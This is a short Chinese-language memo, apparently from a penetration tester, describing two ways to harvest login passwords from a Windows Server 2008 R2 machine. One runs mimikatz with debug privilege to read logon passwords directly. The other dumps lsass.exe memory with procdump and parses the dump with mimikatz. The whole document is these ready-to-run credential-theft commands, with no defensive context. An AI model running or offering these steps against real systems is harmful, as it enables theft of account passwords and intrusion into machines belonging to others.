目标机 windows server 2008 R2
第一种方法:
cmd下运行mimikatz.exe,然后依次输入下面命令
privilege::debug
sekurlsa::logonpasswords
成功抓到服务器密码
第二种方法:
下载个procdump,https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump,然后
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords